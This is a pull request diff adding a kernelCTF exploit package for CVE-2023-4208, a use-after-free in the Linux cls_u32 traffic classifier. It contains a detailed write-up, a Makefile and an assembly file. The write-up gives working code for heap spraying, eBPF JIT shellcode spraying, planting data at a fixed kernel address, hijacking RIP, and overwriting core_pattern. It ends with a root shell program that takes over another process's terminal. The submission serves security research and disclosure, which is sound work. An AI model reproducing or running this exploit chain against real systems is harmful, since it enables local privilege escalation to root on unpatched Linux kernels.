CVE-2023-4208_lts_cos_mitigation #7

Open
wants to merge 2 commits into
base: test
230 changes: 230 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4208_lts_cos_mitigation/docs/exploit.md
@@ -0,0 +1,230 @@
### Triggering Vulnerability
This vulnerability lets us drop the reference counter of a qdisc class to 0 and then free the class (by deleting it) while it is still attached to an active filter.
When a packet is sent to the network, it is enqueued to the network scheduler. If the packet matches our filter, the classifier returns the freed qdisc class.
The qdisc class object contains a pointer to a qdisc object, whose function pointer is used to enqueue packets to the respective network interface.

The snippet below shows the relevant code when `drr_class` is the target object.

```c++
static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch,
                       struct sk_buff **to_free)
{
    unsigned int len = qdisc_pkt_len(skb);
    struct drr_sched *q = qdisc_priv(sch);
    struct drr_class *cl;
    int err = 0;
    bool first;

    cl = drr_classify(skb, sch, &err); // [1]
    ...
    err = qdisc_enqueue(skb, cl->qdisc, to_free);
    ...
    return err;
}

static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
                                struct sk_buff **to_free)
{
    qdisc_calculate_pkt_len(skb, sch);
    return sch->enqueue(skb, sch, to_free); // [2]
}
```

At [1], `drr_classify` returns the freed `drr_class`. The freed object is then dereferenced to obtain the qdisc object via `cl->qdisc`, which is passed to `qdisc_enqueue`. If we control `cl->qdisc->enqueue`, we get RIP control at [2].

### Target objects
Our target object is `struct drr_class`, which resides in kmalloc-128.

### Spray objects

#### For LTS/COS instance

Since CONFIG_KMALLOC_SPLIT_VARSIZE is not set, we can reallocate the freed `struct drr_class` slot with `ctl_buf`. We use sendmsg to spray `ctl_buf` with controlled data at [3].

```C
static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
                           unsigned int flags, struct used_address *used_address,
                           unsigned int allowed_msghdr_flags)
...
        BUILD_BUG_ON(sizeof(struct cmsghdr) !=
                     CMSG_ALIGN(sizeof(struct cmsghdr)));
        if (ctl_len > sizeof(ctl)) {
            ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
            if (ctl_buf == NULL)
                goto out;
        }
        err = -EFAULT;
        if (copy_from_user(ctl_buf, msg_sys->msg_control_user, ctl_len)) //[3]
            goto out_freectl;

#### For Mitigation instance
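Because CONFIG_KMALLOC_SPLIT_VARSIZE is enabled, variable-size allocations such as `ctl_buf` no longer share a cache with the target, so we need a fixed-size struct that is allocated from the kmalloc-128 fixed cache. We found that `struct ctnetlink_filter` lands in the right cache, so we spray it and place our payload in it.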

```C
static struct ctnetlink_filter *
ctnetlink_alloc_filter(const struct nlattr * const cda[], u8 family)
{
    struct ctnetlink_filter *filter;
    int err;
    ...

    filter = kzalloc(sizeof(*filter), GFP_KERNEL);
    ...
    err = ctnetlink_parse_zone(cda[CTA_ZONE], &filter->zone);
    if (err < 0)
        goto err_filter;

    err = ctnetlink_parse_filter(cda[CTA_FILTER], filter);
    if (err < 0)

```

### KASLR Bypass
#### Spray eBPF programs
Our goal is to spray eBPF JIT pages so that, once we control kernel RIP, we can jump into a JIT page and execute our shellcode.

The Linux kernel provides the socket option `SO_ATTACH_FILTER`, which lets a user attach a classic BPF program to a socket as a filter for incoming packets. The kernel converts each classic BPF program to eBPF internally and JIT-compiles it.

By creating many sockets and attaching a classic BPF program to each of them, we can spray a large number of eBPF programs in the kernel.
```cpp
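struct sock_fprog prog = {
    .len = TSIZE,
    .filter = filter,
};
for (int i = 0; i < NUM; i++) {
    int fd[2];
    SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
    // SO_ATTACH_FILTER (value 26 on x86): one JIT-compiled program per socket
    SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)));
}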
```

The shellcode in our eBPF program overwrites `/proc/sys/kernel/core_pattern`, so that we can later execute a command as root by triggering a crash. The shellcode does the following:
* Use the `rdmsr` instruction to obtain a kernel text address. With RCX set to MSR_LSTAR (`0xc0000082`), it returns the address of `entry_SYSCALL_64`.
* Calculate the addresses of `core_pattern` and `_copy_from_user` from that leak.
* Call `_copy_from_user(core_pattern, user_buf, 0x30);`, where `user_buf` is a user-space buffer holding the content we want to write into `core_pattern`.

We construct our eBPF program with the following form:

```cpp
struct sock_filter table[] = {
    {.code = BPF_LD + BPF_K, .k = 0xb3909090},
    {.code = BPF_LD + BPF_K, .k = 0xb3909090},
    .....................
};
```

The above example will be compiled into the following instructions after JIT:

```
b8 90 90 90 b3 mov eax, 0xb3909090
b8 90 90 90 b3 mov eax, 0xb3909090
```

If we can redirect kernel RIP into one of the NOP bytes (`0x90`) instead of the start of a `mov`, the same bytes decode as:

```
90 nop
b3 b8 mov bl, 0xb8
90 nop
90 nop
90 nop
b3 b8 mov bl, 0xb8
....
```

The extra byte `0xb3` turns the following `0xb8` opcode byte into the operand of `mov bl, imm8`, so the otherwise useless `0xb8` is skipped and execution continues in our own bytes. Because of this skipping byte, only 3 bytes of each instruction are available for shellcode, which has to be taken into account when constructing it.

#### Put payload in fixed kernel address (CVE-2023-0597)
On x86, the Linux kernel maps `cpu_entry_area` at a fixed kernel address, and that region is also used as the exception stack. We can load our payload into the registers and trigger an exception from user space. The exception handler pushes the registers onto the exception stack, which gives us controlled data at a fixed kernel address.

First, install signal handlers that catch the resulting signals and skip the offending instruction.
```C
signal(SIGFPE, handle);
signal(SIGTRAP, handle);
signal(SIGSEGV, handle);
setsid();
foo(payload);
```

Then load the payload into the registers in a specific order:

```asm
foo:
    mov rsp,rdi
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    pop rbx
    pop r11
    pop r10
    pop r9
    pop r8
    pop rax
    pop rcx
    pop rdx
    pop rsi
    pop rdi
    div qword [0x1234000] ; trigger div 0 exception
```

As a result, we control about 0x80 bytes at a fixed kernel address.

### RIP Control
We set `cl->qdisc` to the fixed kernel address that holds our controlled data, and set the `enqueue` function pointer inside that data to a guessed eBPF JIT address.

### Post RIP

Once we control kernel RIP and jump into the middle of our eBPF program, the shellcode overwrites `core_pattern` with `|/proc/%P/fd/666`.

We then use memfd to place an executable payload at fd 666.
```C
int check_core()
{
    // Check if /proc/sys/kernel/core_pattern has been overwritten
    char buf[0x100] = {};
    int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
    read(core, buf, sizeof(buf));
    close(core);
    return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}
void crash(char *cmd)
{
    int memfd = memfd_create("", 0);
    SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
    dup2(memfd, 666);
    close(memfd);
    while (check_core() == 0)
        sleep(1);
    *(size_t *)0 = 0;
}
```

Later, when the coredump happens, the kernel executes our file as root in the root namespace:
```C
*(size_t*)0=0; //trigger coredump
```

The executable `root` spawns a shell when the coredump happens. Its code looks like this:
```c++
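#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>

char buf[0x100];

void* job(void* x){
    // Look up the PID of the process named "billy"
    FILE* fp = popen("pidof billy","r");
    fread(buf,1,sizeof(buf)-1,fp);
    pclose(fp); // streams opened with popen must be closed with pclose
    int pid = strtoull(buf,0,10);
    // Duplicate that process's stdin/stdout/stderr into this process
    int pfd = syscall(SYS_pidfd_open,pid,0);
    int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
    int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
    int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
    dup2(stdinfd,0);
    dup2(stdoutfd,1);
    dup2(stderrfd,2);
    execlp("bash","bash",NULL);
    return NULL; // only reached if execlp fails
}
int main(int argc,char** argv){
    job(0);
}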
```
@@ -0,0 +1,12 @@
- Requirements:
  - Capabilities: CAP_NET_ADMIN
  - Kernel configuration: CONFIG_NET_SCHED=y, CONFIG_NET_CLS_U32=y
  - User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=de5df63228fc
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81
- Affected Version: v3.18-rc1 - v6.5-rc4
- Affected Component: net/sched: cls_u32
- Syscall to disable: disallow unprivileged user namespaces
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-4208
- Cause: Use-After-Free
- Description: A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation. When u32_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free. We recommend upgrading past commit 3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81.
@@ -0,0 +1,18 @@
exploit: poc root run.sh
	tar czf ./poc.tar.gz root poc POC ip0 ip1
	cp run.sh exploit
	fallocate -l 512 exploit
	dd if=poc.tar.gz of=exploit conv=notrunc oflag=append

poc: poc.c foo.o sc.h
	gcc poc.c -o poc -static -no-pie -g foo.o -pthread
root: root.c
	gcc -static -o root root.c
foo.o: foo.s
	nasm -f elf64 foo.s
sc.h: sc.py
	python3 sc.py > sc.h

clean:
	rm -rf exploit poc foo.o sc.h root

Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,25 @@
section .text
global write_to_cpu_entry_area
global handle
write_to_cpu_entry_area:
    mov rsp,rdi
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    pop rbx
    pop r11
    pop r10
    pop r9
    pop r8
    pop rax
    pop rcx
    pop rdx
    pop rsi
    pop rdi
    div qword [0x1234000]



